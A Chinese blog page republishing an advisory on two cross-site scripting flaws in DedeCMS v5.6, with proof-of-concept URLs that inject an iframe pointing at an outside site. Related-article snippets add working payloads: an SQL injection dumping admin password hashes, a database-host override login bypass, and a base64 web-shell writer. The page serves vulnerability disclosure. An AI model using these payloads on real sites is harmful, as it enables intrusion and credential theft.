dedecms织梦 v5.6 两处跨站漏洞

最新推荐文章于 2023-02-07 11:13:45 发布
最新推荐文章于 2023-02-07 11:13:45 发布
阅读量179 收藏
点赞数
文章标签: php
漏洞版本:
dedecms织梦 v5.6
漏洞描述:
DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。高效率标签缓存机制:允许对类同的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在模型不能满足用户所有需求的情况下,DedeCMS推出一些互动的模块对系统进行补充,尽量满足用户的需求。

demo1:http://www.test.com/plus/search.php?keyword=zhuba&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&TotalResult=%3Ciframe%20src=http://www.zhuba.net%3E&PageNo=2

demo2:http://www.test.com/member/login.php?gourl=%22%3E%3Ciframe%20src=http://www.zhuba.net%3E
<* 参考
http://www.zhuba.net
http://sebug.net/appdir/织梦(DedeCms)
*>
测试方法:
@Sebug.net   dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
    1. /plus/search.php?keyword=zhuba&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&TotalResult=%3Ciframe%20src=http://www.zhuba.net%3E&PageNo=2
    2.  
    3. http://www.test.com/member/login.php?gourl=%22%3E%3Ciframe%20src=http://www.zhuba.net%3E
weixin_33928137
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DedeCms V5.6 parse_str函数引起的sql注入漏洞
今天也要加油鸭
04-13 1194
这个是去年跟着红日代码审计复现的织梦cms有parse_str()函数引起的漏洞,特来记录一下。 一、下载 下载地址:http://www.dedecms/upimg/soft/2010/DedeCmsV5.6-UTF8-Final.tar.gz 二、安装 ...
DEDECMS v5.6漏洞复现
_Ralph的博客
01-16 7940
织梦内容管理系统(dedecms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类cms系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展和进步,DedeCms免费版的主要目标用户锁定在个人站长,功能更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用该系统。 闲来无事,复现一下dedecms v5.6版
DedeCms V5.6 本地包含里的上传漏洞(可是那包含漏洞已经公布)
weixin_33742618的博客
04-19 422
2019独角兽企业重金招聘Python工程师标准>>> ...
【原】织梦dedecms v5.6 discuz7.2 xss漏洞
步满生错的专栏
09-28 2580
2010年07月05日 星期一 23:31 由于某度众所周知的举动,让我搬离写了5年的渣度空间,准备把技术性的文章定在CSDN了。这些都是文章备份。勿怪。。 鉴于最近有些抓取机器和抄袭者,把标题的【原】字都复制,我不得不声明:本文为 yukon12345原创,转载请注明出
php越权访问漏洞,织梦(DedeCms) v5.6-5.7 越权访问漏洞
weixin_29220405的博客
03-24 648
http://www.XXXX.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS]...
php 5.6.15漏洞,DEDECMS 5.6最新Get Shell漏洞 DEDECMS 5.3/5.6
weixin_39636333的博客
03-11 196
DEDECMS 5.6最新Get Shell漏洞影响版本:  DEDECMS 5.3/5.6漏洞描述:DedeCms 基于PHP+MySQL的技术开发,支持Windows、Linux、Unix等多种服务器平台,从2004年开始发布第一个版本开始,至今已经发布了五个大版本。DedeCms以简单、健壮、灵活、开源几大特点占领了国内CMS的大部份市场,目前已经有超过二十万个站点正在使用DedeCms或居...
dedecms 漏洞汇总
积木网络
02-29 1万+
Dedecms 5.6 rss注入漏洞   http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2)) AND "'" AND updatexml(1,(SELECT CONCAT(0x5b,uname,0x3a,MID(pwd,4,16),0x5d) FROM dede_admin),1)#'][0]=1 DedeCms v5.6 嵌入
织梦v5.6版本漏洞
最新发布
weixin_61842894的博客
02-07 364
织梦v5.6版本漏洞
【dede常见漏洞以及解决方法】
u011168635的专栏
09-08 1374
dede的漏洞公认的多,接手这个网站也接触了不少,现在就把几种接触到的或者了解到的漏洞记录下来,让大家可以提高警惕,防止网站被攻击。 1.dede dialog目录下的配置文件漏洞   如果有能力的同学最好好好研究下这个目录下的文件,漏洞太多了,先只说我遇到的一处 在include/dialog下的config.php第35行     if($cuserL
[源码和文档分享]基于JAVA实现的超级马里奥(Super Mario)游戏
12-07 1660
一、项目简介 刚进入的时候会有一个界面,为地图编辑器。可以使用此编辑器进行地图编辑,地图编辑器的内容包括:关卡、向左箭头、带有金币的砖块、带有花朵的砖块带有蘑菇的砖块、带有星星的砖块、普通砖块、向左运动的板栗仔、向右运动的板栗仔、向左运动的乌龟、向右运动的乌龟、金币、带有食人花的管道、普通管道、洞、向右的箭头、橡皮擦、可以使用鼠标点击图标然后拖动到面板上点击面板...
DedecmsV5.7任意代码执行漏洞复现(靶场及工具已打包)
爱国小白帽
12-29 2467
声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理,著作权归爱国小白帽所有 准备 靶场及工具打包在公众号,回复“dede”领取,也可单独下载 dedecmsV5.7靶机源码 冰蝎3.0window版 可公网访问的云端服务器(如果没有可用本地虚拟机模拟) phpstudy D盾(次要) FinalShell(次要) 首先将靶机解压,进入install目录,将install_lock.txt文件删除,inde.
锚链接跳转
Hero_rong的博客
03-17 1152
想让页面跳转到指定的地方,这个时候我们可以用到锚链接,锚链接主要有两个部分组成,点击的地方和跳转的地方,点击的地方我们用 &lt;a&gt; 标签,其href 属性和即将跳转的标签的 id 保持一致就可以了,举个栗子: 点击j 就跳转到j对应的地方了 ...
C#串口通信—传输文件测试
weixin_33795806的博客
12-03 578
说明:该程序可能不具备实用性,仅测试用。 一、使用虚拟串口工具VSPD虚拟两个串口COM1和COM2 二、约定 占一个字节,代码如下: using System; using System.Collections.Generic; using System.Linq; using System.Text; namespace COMClient { //...
DEDECMS 爆严重安全漏洞 免账号密码直接进入后台
热门推荐
IT技术宅-北方的刀郎
03-21 1万+
DEDECMS 爆严重安全漏洞 免账号密码直接进入后台来源:互联网 作者:佚名 时间:08-20 23:46:44 【大 中 小】众所周知,因使用简单、客户群多,织梦CMS一直被爆出许多漏洞。今天小编在群里得到织梦官方论坛某版主可靠消息:DEDECMS爆严重安全漏洞,近期官方会发布相关补丁,望大家及时关注补丁动态。入侵步骤如下:http://www.xx.com/织梦网站后台/login.php?
DedeCMS 5.7 config.php 跨站脚本漏洞
weixin_30633949的博客
12-26 459
漏洞版本: DedeCMS 5.7 漏洞描述: DeDeCMS v5.7 在/include/dialog/config.php文件中存在XSS漏洞,攻击者可以利用该漏洞盗取用户Cookie、挂马等。 <* 参考 http://bbs.dedecms.com/612431.htmlhttp://sebug.net/appdir/DedeCMS *> 安...
【应用安全——XSS】Referer XSS
Fly_鹏程万里
02-22 2977
首先说一下不同浏览器对’ ” &lt; &gt;的URL编码机制是不同的,例如: IE: 不会对’ ” &lt; &gt;编码 Chrome: 会对’ ” &lt; &gt;编码 FireFox: 会对’ ” &lt; &gt;编码 以PHP为例,$_GET[‘x’]获取参数值时会对参数进行URL解码。 而如果服务端取出URI直接回显的话就会导致XSS。 如果服务...
Kubeadmin 搭建K8S 环境 与 Harbor 私有仓库
段小宝的博客
08-16 1129
目录前言一、Kubeadmin 前言 大企业会用 二进制部署安装 K8s , 中小型公司都会用搭建更方便的 Kubeadmin 、Rancher 集群管理工具 进行搭建, rancher:https://rancher.com/docs/rancher/v1.6/zh/ 一、Kubeadmin Kubeadmin 也是一个工具,提供 yum 安装 kubeadm init 和 kubeadm join,用于快速部署K8s集群,相对简单。 部署地址: https://kubernetes.io/doc
DedeCms v5.6 嵌入恶意代码执行漏洞
Yatere的天平秤
04-25 1222
在上传软件的地方,对本地地址没有进行有效的验证,可以被恶意利用注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name/="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行a{/dede:link}{dede:toby57 name/="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值